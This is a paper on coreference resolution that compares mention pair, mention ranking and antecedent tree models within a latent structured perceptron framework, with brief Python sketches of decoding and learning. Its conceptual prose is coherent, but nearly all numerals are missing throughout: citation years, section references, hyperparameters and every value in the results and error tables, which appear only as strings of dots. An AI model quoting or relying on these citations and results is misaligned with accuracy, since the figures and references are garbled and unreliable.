framework and highlight key differences and similarities (section ). finally, we present an extensive comparison and analysis of the implemented approaches, both quantitative and qualitative (sections and ). our analysis shows that a mention ranking architecture with latent antecedents performs best, mainly due to its ability to structurally model determining anaphoricity. finally, we briefly describe how entity-centric approaches fit into our framework (section ). an open source toolkit which implements the machine learning framework and the approaches discussed in this paper is available for download at http://smartschat.de/software.
transactions of the association for computational linguistics, vol. , pp. – , .
action editor: mark johnson. submission batch: / ; revision batch / ; published / . c© association for computational linguistics. distributed under a cc-by . license. modeling coreference resolution the aim of automatic coreference resolution is to predict a clustering of mentions such that each clus- ter contains all mentions that are used to refer to the same entity. however, most coreference resolution models reduce the problem to predicting coreference between pairs of mentions, and jointly or cascad- ingly consolidating these predictions. approaches differ in the scope (pairwise, per anaphor, per docu- ment, ...) they employ while learning a scoring func- tion for these pairs, and the way the consolidating is handled. the different ways to employ the scope and to consolidate decisions can be understood as operat- ing on latent structures: as pairwise links are not annotated in the data, coreference approaches create structures (either heuristically or data-driven) that guide the learning of the pairwise scoring function. to understand this better, let us consider two ex- amples. mention pair models (soon et al., ; ng and cardie, ) cast the problem as first cre- ating a list of mention pairs, and deciding for each pair whether the two mentions are coreferent. af- terwards the decisions are consolidated by a cluster- ing algorithm such as best-first or closest-first. we therefore can consider this approach to operate on a list of mention pairs where each pair is handled in- dividually. in contrast, antecedent tree models (fer- nandes et al., ; björkelund and kuhn, ) consider the whole document at once and predict a tree consisting of anaphor-antecedent pairs. a structured prediction framework in this section we introduce a structured prediction framework for learning coreference predictors with latent variables. when devising the framework, we focus on accounting for the latent structures under- lying coreference resolution approaches. the frame- work is a generalization of previous work on latent antecedents and trees for coreference resolution (yu and joachims, ; chang et al., ; fernandes et al., ). . setting in all prediction tasks, the goal is to learn a mapping f from inputs x ∈ x to outputs y ∈ yx. a predic- tion task is structured if the output elements y ∈yx exhibit some structure. as we work in a latent vari- able setting, we assume that yx = hx ×zx, and therefore y = (h,z) ∈ hx × zx. we call h the hidden or latent part, which is not observed in the data, and z the observed part (during training). we assume that z can be inferred from h, and that in a pair (h,z), h and z are always consistent. we first define the input space x and the output spaces hx and zx for x ∈x . . the input space x the input space consists of documents. we repre- sent a document x ∈ x as follows. let us assume that mx is the set of mentions (expressions which may be used to refer to entities) in the document. we write mx = {m , . . . ,mk}, where the mi are in ascending order with respect to their position in the document. we then consider m x = {m } ∪ mx, where m precedes every mi ∈ mx (chang et al., ; fernandes et al., ). m plays the role of a dummy mention for anaphoricity detection: if m is chosen as the an- tecedent, the corresponding mention is deemed as non-anaphoric. this enables joint coreference reso- lution and anaphoricity determination. . the latent space hx for an input x let x ∈x be some document. 
as we saw in the pre- vious section, approaches to coreference resolution predict a latent structure which is not annotated in the data but is used to infer coreference information. inspired by previous work on coreference (bengtson and roth, ; fernandes et al., ; martschat and strube, ), we now develop a graph-based representation for these structures. a valid latent structure for the document x is a labeled directed graph h = (v,a,la) where • the set of nodes are the mentions, v = m x, • the set of edges a consists of links between mentions pointing back in the text, a ⊆{(mj,mi) |j > i}⊆ mx ×m x. • la : a → l assigns a label ` ∈ l to each edge. l is a finite set of labels, for example signaling coreference or non-coreference. we split h into subgraphs (called substructures from now on), which we notate as h = h ⊕. . .⊕hn, with hi = (vi,ai,lai) ∈ hx,i, where hx,i is the latent space for an input x restricted to the mentions appearing in hi. hi encodes coreference decisions for a subset of mentions in x. m m m m − + − − + + figure : graph-based representation of the mention pair model. the dashed box shows one substructure of the structure. figure depicts a graph that captures the latent structure underlying the mention pair model. men- tion pairs are represented as node connected by an edge. the edge either has label “+” (if the mentions are coreferent) or “−” (otherwise). as the mention pair model considers each mention pair individually, each edge is one substructure of the latent structure (expressed via the dashed box). we describe this representation in more detail in section . . . the observed output space zx for an input x let x ∈x be some document. the observed output space consists of all functions ex : mx → n that map mentions to entity identifiers. two mi,mj ∈ mx are coreferent if and only if ex(mi) = ex(mj). ex is inferred from the latent structure, e.g. by taking the transitive closure over coreference decisions. this representation corresponds to the way coref- erence is annotated in corpora. . linear models let us write h = ∪x∈xhx for the full latent space (analogously z). our goal is to learn the mapping f : x → h×z. we assume that the mapping is parametrized by a weight vector θ ∈ rd, and there- fore write f = fθ. we restrict ourselves to linear models. that is, fθ(x) = arg max (h,z)∈hx×zx 〈θ,φ(x,h,z)〉, where φ: x ×h×z → rd is a joint feature func- tion for inputs and candidate outputs. since h = h ⊕ . . .⊕hn, we have fθ(x) = arg max (h,z)∈hx×zx 〈θ,φ(x,h,z)〉 = n⊕ i= arg max (hi,z)∈hx,i×zx 〈θ,φ(x,hi,z)〉. in this paper, we only consider feature functions which factor with respect to the edges in hi = (vi,ai,lai), i.e. φ(x,hi,z) = ∑ a∈ai φ(x,a,z). hence, the features examine properties of mention pairs, such as head word of each mention, number of each mention, or the existence of a string match. we describe the feature set used for all approaches represented in our framework in section . . . decoding given an input x ∈ x and a weight vector θ ∈ rd, we obtain the prediction by solving the arg max equation described in the previous subsection. this can be viewed as searching the output space hx×zx for the highest scoring output pair (h,z). the details of the search procedure depend on the space hx of latent structures and the factorization into substructures. for the structures we consider in this paper, the maximization can be solved exactly via greedy search. 
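a minimal sketch of this greedy decoding for ranking-style substructures is shown below; it is not the released toolkit. phi is an assumed feature extractor for an (anaphor, candidate antecedent) pair, and index 0 plays the role of the dummy mention m0.

```python
# Because the feature function factors over edges, each substructure can be
# maximized independently by picking its highest-scoring arc.
import numpy as np


def decode_ranking(mentions, phi, theta):
    """Return one antecedent index (0 = dummy mention) per mention j >= 1."""
    arcs = {}
    for j in range(1, len(mentions)):
        candidates = range(0, j)                  # all preceding mentions and the dummy
        scores = [theta @ phi(mentions, j, i) for i in candidates]
        arcs[j] = int(np.argmax(scores))
    return arcs


def entities_from_arcs(arcs, n_mentions):
    """Infer the observed output z by transitive closure over antecedent arcs."""
    entity = list(range(n_mentions))              # each mention starts as its own entity
    for j, i in sorted(arcs.items()):
        if i != 0:                                # an arc to the dummy marks non-anaphoricity
            entity[j] = entity[i]
    return entity
```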
for structures with complex con- straints like transitivity, more complex or even ap- proximate search methods need to be used (klenner, ; finkel and manning, ). . learning we assume a supervised learning setting with latent variables, i.e., we have a training set of documents d = {( x(i),z(i) ) | i = , . . . ,m } at our disposal. note that the latent structures are not encoded in this training set. in principle we would like to directly optimize for the evaluation metric we are interested in. un- fortunately, the evaluation metrics used in corefer- ence do not allow for efficient optimization based on mention pairs, since they operate on the entity level. for example, the ceafe metric (luo, ) needs to compute optimal entity alignments between gold and system entities. these alignments do not factor with respect to mention pairs. we therefore have to use some surrogate loss. algorithm structured latent perceptron with cost- augmented inference. input: training set d, a cost function c, number of epochs n. function perceptron(d, c, n) set θ = ( , . . . , ) for epoch = , . . . ,n do for (x,z) ∈d do for each substructure do ĥopt,i = arg max hi∈const(hx,z,i) 〈θ,φ(x,hi,z)〉 (ĥi, ẑ) = arg max (hi,z)∈hx,i×zx (〈θ,φ(x,hi,z)〉 +c(x,hi, ĥopt,i,z)) if ĥi does not partially encode z then set θ = θ + φ(x,ĥopt,i,z) −φ(x,ĥi, ẑ) output: a weight vector θ. we employ a structured latent perceptron (sun et al., ) extended with cost-augmented inference (crammer et al., ) to learn the parameters of the models we discuss. while this restricts us to a particular objective to optimize, it comes with var- ious advantages: the implementation is simple and fast, we can incorporate error functions via cost- augmentation, the structures are plug-and-play if we provide a decoder, and the (structured) perceptron with cost-augmented inference has exhibited good performance for coreference resolution (chang et al., ; fernandes et al., ). to describe the algorithm, we need some addi- tional terminology. let (x,z) be a training exam- ple. let (ĥ, ẑ) = fθ(x) be the prediction under the model parametrized by θ. let hx,z be the space of all latent structures for an input x that are consistent with a coreference output z. structures in hx,z pro- vide substitutes for gold structures in training. some approaches restrict hx,z, for example by learning only from the closest antecedent of a mention (denis and baldridge, ). hence, we consider the con- strained space const(hx,z) ⊆ hx,z, where const is a function that depends on the approach in focus. ĥopt = arg max h∈const(hx,z) 〈θ,φ(x,h,z)〉 is the optimal constrained latent structure under the current model which is consistent with z. we write ĥi and ĥopt,i for the ith substructure of the latent structure. to estimate θ, we iterate over the training data. for each input, we compute the optimal constrained prediction consistent with the gold information, ĥopt,i. we then compute the optimal prediction (ĥi, ẑ), but also include the cost function c in our maximization problem. this favors solutions with high cost, which leads to a large margin approach. if ĥi does not partially encode the gold data, we update the weight vector. this is repeated for a given number of epochs . algorithm gives a more for- mal description. latent structures in the previous section we developed a machine learning framework for coreference resolution. 
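the following sketch illustrates the algorithm under simplifying assumptions (weight averaging omitted); argmax_constrained and argmax_cost_augmented stand for the decoders described above and are not spelled out here.

```python
# Structured latent perceptron with cost-augmented inference (sketch).
# argmax_constrained(x, z, i, theta) -> (h_opt, phi_opt): best latent
#   substructure consistent with the gold clustering z, and its features.
# argmax_cost_augmented(x, z, i, theta, h_opt) -> (h_hat, phi_hat): best
#   cost-augmented prediction for substructure i, and its features.
import random

import numpy as np


def latent_perceptron(data, substructures, argmax_constrained,
                      argmax_cost_augmented, encodes_gold, dim, n_epochs=5):
    """data: list of (x, z) pairs; returns the learned weight vector."""
    theta = np.zeros(dim)
    for _ in range(n_epochs):
        random.shuffle(data)                      # shuffle before each epoch
        for x, z in data:
            for i in substructures(x):
                h_opt, phi_opt = argmax_constrained(x, z, i, theta)
                h_hat, phi_hat = argmax_cost_augmented(x, z, i, theta, h_opt)
                if not encodes_gold(h_hat, z):    # update only on errors
                    theta += phi_opt - phi_hat
    return theta
```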
it is flexible with respect to • the latent structure h ∈hx for an input x, • the substructures of h ∈hx, • the constrained space of latent structures con- sistent with a gold solution const(hx,z), and • the cost function c and its factorization. in this paper, we focus on giving a unified represen- tation and in-depth analysis of prevalent coreference models from the literature. future work should in- vestigate devising and analyzing novel representa- tions for coreference resolution in the framework. we express three main coreference models in our framework, the mention pair model (soon et al., ), the mention ranking model (denis and baldridge, ; chang et al., ) and antecedent trees (yu and joachims, ; fernandes et al., ; björkelund and kuhn, ). we character- ize each approach by the latent structure it operates on during learning and inference (we assume that all approaches we consider share the same features). furthermore, we also discuss the factorization into substructures and typical cost functions used in the literature. . mention pair model we first consider the mention pair model. in its orig- inal formulation, it extracts mention pairs from the we also shuffle the data before each epoch and use averag- ing (collins, ). data and labels these as positive or negative. during testing, all pairs are extracted and some clustering algorithm such as closest-first or best-first is applied to the list of pairs. during training, some heuristic is applied to help balancing positive and negative ex- amples. the most popular heuristic is to take the closest antecedent of an anaphor as a positive exam- ple, and all pairs in between as negative examples. latent structure. in our framework, we can rep- resent the mention pair model as a labeled graph. in particular, let the set of edges be all backward- pointing edges, i.e. a = {(mj,mi) |j > i}. in the testing phase, we operate on the whole set a. dur- ing training, we consider only a subset of edges, as defined by the heuristic used by the approach. the labeling function maps a pair of mentions to a positive (“+”) or a negative label (“−”) via la(mj,mi) = { + mj,mi are coreferent, − otherwise. one such graph is depicted in figure (section ). a clustering algorithm (like closest-first or best- first) is then employed to infer the coreference infor- mation from this latent structure. substructures. in the mention pair model, the parts of the substructures are the individual edges: each pair of mentions is considered as an instance from which the model learns and which the model predicts individually. cost function. as discussed above, mention pair approaches employ heuristics to resample the training data. this is a common method to in- troduce cost-sensitivity into classification (elkan, ; geibel and wysotzk, ). hence, mention pair approaches do not use cost functions in addition to the resampling. . mention ranking model the mention ranking model captures competition between antecedents: for each anaphor, the highest- scoring antecedent is selected. for training, this ap- proach needs gold antecedents to compare to. there are two main approaches to determine these: first, they are heuristically extracted similarly to the men- tion pair model (denis and baldridge, ; rah- man and ng, ). second, latent antecedents are employed (chang et al., ): in such models, the highest-scoring preceding coreferent mention of an anaphor under the current model is selected as the gold antecedent. 
figure : latent structure underlying the mention ranking and the antecedent tree approach. the black nodes and arcs represent one substructure for the mention ranking approach.

latent structure. the mention ranking approach can be represented as an unlabeled graph. in particular, we allow any graph with edges a ⊆ {(mj, mi) | j > i} such that for all j there is exactly one i with (mj, mi) ∈ a (each anaphor has exactly one antecedent). figure shows an example graph. we can represent heuristics for creating training data by constraining the latent structures consistent with the gold information hx,z. again, the most popular heuristic is to consider the closest antecedent of a mention as the gold antecedent during training (denis and baldridge, ). this corresponds to constraining hx,z such that const(hx,z) = {h} with h = (v, a, la) and (mj, mi) ∈ a if and only if mi is the closest antecedent of mj. when learning from latent antecedents, the unconstrained space hx,z is considered. to infer coreference information from this latent structure, we take the transitive closure over all anaphor-antecedent decisions encoded in the graph.

substructures. the distinctive feature of the mention ranking approach is that it considers each anaphor in isolation, but all candidate antecedents at once. we therefore define substructures as follows. the jth substructure is the graph hj with nodes vj = {m , . . . , mj} and edges aj = {(mj, mi) | there is i with j > i s.t. (mj, mi) ∈ a}. aj contains the antecedent decision for mj. one such substructure encoding the antecedent decision for m is colored black in figure .

cost function. cost functions for the mention ranking model can reward the resolution of specific classes. the most sophisticated cost function was proposed by durrett and klein ( ), who distinguish between three errors: finding an antecedent for a non-anaphoric mention, misclassifying an anaphoric mention as non-anaphoric, and finding a wrong antecedent for an anaphoric mention. we will use a variant of this cost function in our experiments (described in section . ).

antecedent trees

finally, we consider antecedent trees. this structure encodes all antecedent decisions for all anaphors. in our framework they can be understood as an extension of the mention ranking approach to the document level. so far, research has not investigated constraints on the space of latent structures consistent with the gold annotation.

latent structure. antecedent trees are based on the same structure as the mention ranking approach.

substructures. in the antecedent tree approach, the latent structure does not factor into parts: the whole graph encoding all antecedent information for all mentions is treated as a single instance.

cost function. the cost function from the mention ranking model naturally extends to the tree case by summing over all decisions. furthermore, in principle we can take the structure into account. however, we are not aware of any approaches which go beyond (variations of) hamming loss (hamming, ).

experiments

we now evaluate model variants based on different latent structures on a large benchmark corpus. the aim of this section is to compare popular approaches to coreference only in terms of the structure they operate on, fixing preprocessing and feature set. in section we complement this comparison with a qualitative analysis of the influence of the structures on the output.
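before turning to the data, the practical difference between the ranking and tree structures can be made concrete with a short sketch. it is an illustration only: at prediction time both models select, for every anaphor, the best-scoring antecedent (None stands for the dummy mention), and entities are obtained by taking the transitive closure over these arcs; the difference lies in learning, where the ranking model updates per decision and the antecedent tree model per document. the score function is assumed to be given, e.g., the linear model from the sketch above.

```python
def predict_antecedents(mentions, score):
    # for every anaphor pick the best-scoring antecedent; None is the dummy
    # mention (non-anaphoric). the ranking model treats each decision as a
    # separate substructure, the antecedent tree model treats the whole set
    # of arcs as one structure, but the predicted arcs have the same form.
    arcs = {}
    for j, anaphor in enumerate(mentions):
        candidates = [None] + mentions[:j]
        arcs[anaphor] = max(candidates, key=lambda c: score(anaphor, c))
    return arcs

def entities_from_arcs(mentions, arcs):
    # transitive closure over the anaphor-antecedent decisions via union-find
    parent = {m: m for m in mentions}
    def find(m):
        while parent[m] != m:
            parent[m] = parent[parent[m]]
            m = parent[m]
        return m
    for anaphor, antecedent in arcs.items():
        if antecedent is not None:
            parent[find(anaphor)] = find(antecedent)
    clusters = {}
    for m in mentions:
        clusters.setdefault(find(m), []).append(m)
    return list(clusters.values())
```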
data and evaluation metrics the aim of our evaluation is to assess the effec- tiveness and competitiveness of the models imple- mented in our framework in a realistic coreference setting, i.e. without using gold information such as gold mentions. as all models we consider share the same preprocessing and features, this allows for a fair comparison of the individual structures. we train, evaluate and analyze the models on the english data of the conll- shared task on multilingual coreference resolution (pradhan et al., ). the shared task organizers provide the train- ing/development/ test split. we use the training documents for training the models, and evaluate and analyze the models on the development set contain- ing documents. the test set documents are only used for final evaluation. we work in a setting that corresponds to the shared task’s closed track (pradhan et al., ). that is, we make use of the automatically created annotation layers (parse trees, ne information, ...) shipped with the data. as additional resources we use only wordnet . (fellbaum, ) and the number/gender data of bergsma and lin ( ). for evaluation we follow the practice of the conll- shared task and employ the reference implementation of the conll scorer (pradhan et al., ) which computes the popular evaluation met- rics muc (vilain et al., ), b (bagga and bald- win, ), ceafe (luo, ) and their average. the average is the metric for ranking the systems in the conll shared tasks on coreference resolution (pradhan et al., ; pradhan et al., ). . features we employ a rich set of features frequently used in the literature (ng and cardie, ; bengtson and roth, ; björkelund and kuhn, ). the set consists of the following features: • the mention type (name, def. noun, indef. noun, citation form of pronoun, demonstrative) of anaphor, antecedent and both, • gender, number, semantic class, named en- tity class, grammatical function and length in words of anaphor, antecedent and both, • semantic head, first/last/preceding/next token of anaphor, antecedent and both, • distance between anaphor and antecedent in sentences, • modifier agreement, • whether anaphor and antecedent embed each other, • whether there is a string match, head match or an alias relation, • whether anaphor and antecedent have the same speaker. if the antecedent in the pair under consideration is m , i.e. the dummy mention, we do not extract any feature (chang et al., ). state-of-the-art models greatly benefit from fea- ture conjunctions. approaches for building such conjunctions include greedy extension (björkelund and kuhn, ), entropy-guided induction (fernan- des et al., ) and linguistically motivated heuris- tics (durrett and klein, ). we follow durrett and klein ( ) and conjoin every feature with each mention type feature. . model variants we now consider several instantiations of the ap- proaches discussed in the previous section in order of increasing complexity. these instantiations cor- respond to specific coreference models proposed in the literature. with the framework described in this paper, we are able to give a unified account of repre- senting and learning these models. we always train on automatically predicted mentions. we start with the mention pair model. to create training graphs, we employ a slight modification of the closest pair heuristic (soon et al., ), which worked best in preliminary experiments. for each mention mj which is in some coreference chain and has an antecedent mi, we add an edge to mi with label “+”. 
for all k with i < k < j, we add an edge from mj to mk with label “−”. if mj does not have an antecedent, we add edges from mj to mk with label “−” for all < k < j. compared to the heuristic of soon et al. ( ), who only learn from anaphoric mentions, this improves precision. during testing, if for a mention mj no pair (mj,mi) is deemed as coreferent, we consider the mention as not anaphoric. otherwise, we employ best-first clus- tering and take the mention in the highest scoring pair as the antecedent of mj (ng and cardie, ). the mention ranking model tries to improve the mention pair model by capturing the competition between antecedents. we consider two variants of the mention ranking model, where each em- ploys dummy mentions for anaphoricity determina- tion. the first variant closest (denis and baldridge, ) constrains the latent structures consistent with the gold annotation: for each mention, the closest antecedent is chosen as the gold antecedent. if the mention does not have any antecedent, we take the dummy mention m as the antecedent. the sec- ond variant latent (chang et al., ) aims to learn from more meaningful antecedents by dropping the constraints, and therefore selecting the best-scoring antecedent (which may also be m ) under the cur- rent model during training. we view the antecedent tree model (fernandes et al., ) as a natural extension of the mention rank- ing model. instead of predicting an antecedent for each mention, we predict an entire tree of anaphor- antecedent pairs. this should yield more consistent entities. as in previous work we only consider the latent variant. for the mention ranking model and for antecedent trees we use a cost function similar to previous work (durrett and klein, ; fernandes et al., ). for a pair of mentions (mj,mi), we consider cpair(mj,mi) =    λ i > and mj,mi are not coreferent, λ i = and mj is anaphoric, otherwise, where λ > will be tuned on development data. let ĥi = (vi,ai,lai). cpair is extended to a cost function for the whole latent structure ĥi by c(x,ĥi, ĥopt,i,z) = ∑ (mj,mk)∈ai cpair(mj,mk). the use of such a cost function is necessary to learn reasonable weights, since most automatically extracted mentions in the data are not anaphoric. . experimental setup we evaluate the models on the development and the test sets. when evaluating on the test set, we train on the concatenation of the training and development set. after preliminary experiments with the ranking model with closest antecedents on the development set, we set the number of perceptron epochs to and set λ = in the cost function. we assess statistical significance of the difference in f score for two approaches via an approximate randomization test (noreen, ). we say an im- provement is statistically significant if p < . . muc b ceafe model r p f r p f r p f average f conll- english development data fernandes et al. ( ) . . . . . . . . . . björkelund and kuhn ( ) . . . . . . . . . . mention pair . . . . . . . . . . ranking: closest . . . ∗ . . . ∗ . . . ∗ . ranking: latent . . . �× . . . †� . . . †�× . antecedent trees . . . . . . . . . . conll- english test data fernandes et al. ( ) . . . . . . . . . . björkelund and kuhn ( ) . . . . . . . . . . mention pair . . . . . . . . . . ranking: closest . . . ∗ . . . ∗ . . . ∗ . ranking: latent . . . � . . . †� . . . †� . antecedent trees . . . . . . . . . . table : results of different systems and model variants on conll- english development and test data. 
models below the dashed lines are implemented in our framework. the best f score results for each dataset and metric are boldfaced. ∗ indicates significant improvements in f score of ranking: closest compared to mention pair; † indicates significant improvements of ranking: latent compared to ranking: closest; � indicates significant improvements of ranking: latent compared to antecedent trees; × indicates significant improvements of ranking: latent compared to björkelund and kuhn ( ). we do not perform significance tests on differences in average f since this measure constitutes an average over other f scores. . results table shows the result of all model configurations discussed in the previous section on conll’ en- glish development and test data. in order to put the numbers into context, we also report the re- sults of björkelund and kuhn ( ), who present a system that implements an antecedent tree model with non-local features. their system is the highest- performing system on the conll data which op- erates in a closed track setting. we also compare with fernandes et al. ( ), the winning system of the conll- shared task (pradhan et al., ) . both systems were trained on training data for eval- uating on the development set, and on the concatena- we do not compare with the system of durrett and klein ( ) since it uses wikipedia as an additional resource, and therefore does not work under the closed track setting. its per- formance is . average f ( . muc f , . b f and . ceafe f ) on conll- english test data. tion of training and development data for evaluating on the test set. despite its simplicity, the mention pair model yields reasonable performance. the gap to björkelund and kuhn ( ) is roughly . points in average f score on test data. compared to the mention pair model, the variants of the mention ranking model improve the results for all metrics, largely due to increased precision. switching from regarding the closest antecedent as the gold antecedent to latent antecedents yields an improvement of roughly . points in average f . all improvements of the mention ranking model with closest antecedents compared to the mention pair model are statistically significant. furthermore, with the exception of the differences in muc f , all improvements are significant when switching from closest antecedents to latent antecedents. the mention ranking model with latent an- recall precision model errors max % of max errors max % of max mention pair % % ranking: closest % % ranking: latent % % antecedent trees % % table : overview of recall and precision errors. tecedents outperforms the state-of-the-art system by björkelund and kuhn ( ) by more than . points average f . these results show the com- petitiveness of a simple mention ranking architec- ture. regarding the individual f scores compared to björkelund and kuhn ( ), the improvements in the muc and ceafe metrics on development data are statistically significant. the improvements on test data are not statistically significant. using antecedent trees yields higher precision than using the mention ranking model. however, recall is much lower. the performance is similar to the antecedent tree models of fernandes et al. ( ) and björkelund and kuhn ( ). analysis the numbers discussed in the previous section do not give insights into where the models make differ- ent decisions. are there specific linguistic classes of mention pairs where one model is superior to the other? how do the outputs differ? 
how can these differences be explained by different structures em- ployed by the models? in order to answer these questions, we need to per- form a qualitative analysis of the differences in sys- tem output for the approaches. to do so, we employ the error analysis method presented in martschat and strube ( ). in this method, recall errors are ex- tracted via comparing spanning trees of reference entities with system output. edges in the spanning tree missing from the output are extracted as errors. for extracting precision errors, the roles of reference and system entities are switched. to define the span- ning trees, we follow martschat and strube ( ) and use a notion based on ariel’s accessibility the- ory (ariel, ) for reference entities, while we take system antecedent decisions for system entities. . overview we extracted all errors of the model variants de- scribed in the previous section on conll- en- glish development data. table gives an overview of all recall and preci- sion errors. for each model variant the table shows the number of recall and precision errors, and the maximum number of errors . the numbers con- firm the findings obtained from table : the ranking models beat the mention pair model largely due to fewer precision errors. the antecedent tree model outputs more precise entities by establishing fewer coreference links: it makes fewer decisions and fewer precision errors than the other configurations, but at the expense of an increased number of recall errors. the more sophisticated models make consistently fewer linking decisions than the mention pair model. we therefore hypothesize that the improvements in the numbers mainly stem from improved anaphoric- ity determination. the mention pair model handles anaphoricity determination implicitly: if for a men- tion mj no pair (mj,mi) is deemed as coreferent, the model does not select an antecedent for mj . since the mention ranking model allows to include the search for the best antecedent during prediction, we can explicitly model the anaphoricity decision, via including the dummy mention during search. we now examine the errors in more detail to in- vestigate this hypothesis. to do so, we will investi- for recall, the maximum number of errors is the number of errors made by a system that assigns each mention to its own entity. for precision, the maximum number of errors is the total number of anaphor-antecedent decisions made by the model. initial experiments which included the dummy mention during learning for the mention pair model yielded worse re- sults. this is arguably due to the large number of non-anaphoric mentions, which causes highly imbalanced training data. name/noun anaphor pronoun model both name mixed both noun i/you/we he/she it/they remaining upper bound mention pair ranking: closest ranking: latent antecedent trees table : recall errors of model variants on conll- english development data. name/noun anaphor pronoun model both name mixed both noun i/you/we he/she it/they remaining err. corr. err. corr. err. corr. err. corr. err. corr. err. corr. err. corr. mention pair ranking: closest ranking: latent antecedent trees table : precision errors (err.) and correct links (corr.) of model variants on conll- english development data. gate error classes, and compare the models in terms of how they handle these error classes. this is a practice common in the analysis of coreference reso- lution approaches (stoyanov et al., ; martschat and strube, ). 
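a much simplified sketch of this error extraction may help to follow the analysis below. it assumes mentions are represented by comparable positions and, unlike the original method, simply chains the mentions of an entity in textual order instead of building spanning trees from accessibility theory (for reference entities) or from antecedent decisions (for system entities); the function names are ours.

```python
def spanning_edges(entity):
    # simplification: chain the mentions of an entity in textual order
    ms = sorted(entity)
    return [(ms[i], ms[i + 1]) for i in range(len(ms) - 1)]

def extract_errors(reference_entities, system_entities):
    # recall errors: spanning edges of reference entities whose two mentions
    # the system does not place in the same entity; precision errors: the same
    # computation with the roles of reference and system entities switched
    def entity_ids(entities):
        lookup = {}
        for idx, entity in enumerate(entities):
            for m in entity:
                lookup[m] = idx
        return lookup

    def errors(from_entities, against_entities):
        lookup = entity_ids(against_entities)
        found = []
        for entity in from_entities:
            for m1, m2 in spanning_edges(entity):
                if m1 not in lookup or m2 not in lookup or lookup[m1] != lookup[m2]:
                    found.append((m1, m2))
        return found

    return errors(reference_entities, system_entities), \
           errors(system_entities, reference_entities)
```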
we distinguish between errors where both mentions are a proper name or a com- mon noun, errors where the anaphor is a pronoun and the remaining errors. tables and summarize recall and precision er- rors for subcategories of these classes . we now compare individual models. . mention ranking vs. mention pair for pairs of proper names and pairs of common nouns, employing the ranking model instead of the mention pair model leads to a large decrease in pre- cision errors, but an increase in recall errors. for pronouns and mixed pairs, we can observe decreases in recall errors and slight increases in precision er- rors, except for it/they, where both recall precision errors decrease. we can attribute the largest differences to deter- mining anaphoricity: in % of all precision errors for the pronoun subcategories, we map each pronoun to its canonical form. for example, we map him to he. between two proper names made by the mention pair model, but not by the ranking model, the mention appearing later in the text is non-anaphoric. the ranking model correctly determines this. similar numbers hold for common noun pairs. while most nouns and names are not anaphoric, most pronouns are. hence, determining anaphoric- ity is less of an issue here. from the resolved it/they recall errors of the ranking model compared to the mention pair model, we can attribute % to bet- ter antecedent selection: the mention pair model de- cided on a wrong antecedent. the ranking model, however, was able to leverage the competition be- tween the antecedents to decide on a correct an- tecedent. the remaining % stem from selecting a correct antecedent for pronouns that were classified as non-anaphoric by the mention pair model. we observe similar trends for the other pronoun classes. overall, the majority of error reduction can be attributed to improved determination of anaphoric- ity, which can be modeled structurally in the men- tion ranking model (we do not use any features when a dummy mention is involved, therefore non- anaphoricity decisions always get the score ). however, for pronoun resolution, where there are many competing compatible antecedents for a men- tion, the model is able to learn better weights by leveraging the competition. these findings suggest that extending the mention pair model to explicitly determine anaphoricity should improve results espe- cially for non-pronominal coreference. . latent antecedent vs. closest antecedent using latent instead of closest antecedents leads to fewer recall errors and more precision errors for non-pronominal coreference. pronoun resolution re- call errors slightly increase, while precision errors slightly decrease. while these changes are minor, there is a large reduction in the remaining precision errors. most of these correspond to predictions which are consid- ered very difficult, such as links between a proper name anaphor and a pronoun antecedent (bengtson and roth, ). via latent antecedents, the model can avoid learning from the most unreliable pairs. . antecedent trees vs. ranking compared to the ranking model with latent an- tecedents, the antecedent tree model commits con- sistently more recall errors and fewer precision er- rors. this is partly due to the fact that the antecedent tree model also predicts fewer links between men- tions than the other models. the only exception is he/she, where there is not much of a difference. 
the only difference between the ranking model with latent antecedents and the antecedent tree model is that weights are updated document-wise for antecedent trees, while they are updated per anaphor for the ranking model. this leads to more precise predictions, at the expense of recall. . summary our analysis shows that the mention ranking model mostly improves precision over the mention pair model. for non-pronominal coreference, the im- provements can be mainly attributed to improved anaphoricity determination. for pronoun resolution, both anaphoricity determination and capturing an- tecedent competition lead to improved results. em- ploying latent antecedents during training mainly helps in resolving very difficult cases. due to the update strategy, employing antecedent trees leads to a more precision-oriented approach, which signifi- cantly improves precision at the expense of recall. beyond pairwise predictions in this paper we concentrated on representing and analyzing the most prevalent approaches to coref- erence resolution, which are based on predicting whether pairs of mentions are coreferent. hence, we choose graphs as latent structures and let the feature functions factor over edges in the graph, which cor- respond to pairs of mentions. however, entity-based approaches (rahman and ng, ; stoyanov and eisner, ; lee et al., , inter alia) obtain coreference chains by pre- dicting whether sets of mentions are coreferent, go- ing beyond pairwise predictions. while a detailed discussion of such approaches is beyond the scope of this paper, we now briefly describe how we can generalize the proposed framework to accommodate for such approaches. when viewing coreference resolution as predic- tion of latent structures, entity-based models op- erate on structures that relate sets of mentions to each other. this can be expressed by hypergraphs, which are graphs where edges can link more than two nodes. hypergraphs have already been used to model coreference resolution (cai and strube, ; sapena, ). to model entity-based approaches, we extend the valid latent structures to labeled directed hyper- graphs. these are tuples h = (v,a,la), where • the set of nodes are the mentions, v = m x, • the set of edges a ⊆ v × v consists of di- rected hyperedges linking two sets of mentions, • la : a → l assigns a label ` ∈ l to each edge. l is a finite set of labels. for example, the entity-mention model (yang et al., ) predicts coreference in a left-to-right fash- ion. for each anaphor mj, it considers the set ej ⊆ {m ,...,mj− } of preceding partial entities that have been estab- lished so far (such as e = {m ,m ,m }). in terms of our framework, substructures for this ap- proach are hypergraphs with hyperedges ({mj} ,e) for e ∈ ej, encoding the decision to which partial entity mj refers. the definitions of features and the decoding prob- lem carry over from the graph-based framework (we drop the edge factorization assumption for features). learning requires adaptations to cope with the de- pendency between coreference decisions. for exam- ple, for the entity-mention model, establishing that an anaphor mj refers to a partial entity e influences the search space for decisions for anaphors mk with k > j. we leave a more detailed discussion to future work. related work the main contributions of this paper are a frame- work for representing coreference resolution ap- proaches and a systematic comparison of main coreference approaches in this framework. 
